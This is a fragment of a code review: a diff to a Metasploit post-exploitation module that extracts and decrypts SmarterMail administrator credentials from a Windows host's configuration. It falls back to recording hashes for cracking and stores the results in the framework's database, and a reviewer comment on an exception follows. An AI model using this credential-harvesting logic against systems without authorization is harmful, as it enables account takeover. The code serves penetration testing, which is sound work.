modules/post/windows/gather/credentials/smartermail.rb

```diff
@@ -106,12 +138,56 @@ def get_smartermail_creds(path)
     end
 
     username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/)
-    password = data.match(/<sysAdminPassword>(.+)<\/sysAdminPassword>/)
+    password = data.scan(/<(sysAdminPassword|sysAdminPasswordHash)>(.+)<\/(sysAdminPassword|sysAdminPasswordHash)>/).flatten[1]
+
     result['username'] = username[1] unless username.nil?
-    result['password'] = decrypt_des(Rex::Text.decode_base64(password[1])) unless password.nil?
+
+    if password
+      begin
+        result['password'] = decrypt_des(Rex::Text.decode_base64(password))
+        result['password_type'] = :password
+      rescue OpenSSL::Cipher::CipherError
+        result['password'] = password
+        result['password_type'] = :nonreplayable_hash
+        result['jtr_format'] = 'des'
+      end
+    end
+
     result
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: opts[:password_type],
+      username: opts[:user]
+    }
+
+    if opts[:password_type] == :nonreplayable_hash
```

Comment:
or maybe not..... since you're doing `private_type: opts[:password_type]`.... I don't know why is raising the exception so, checking....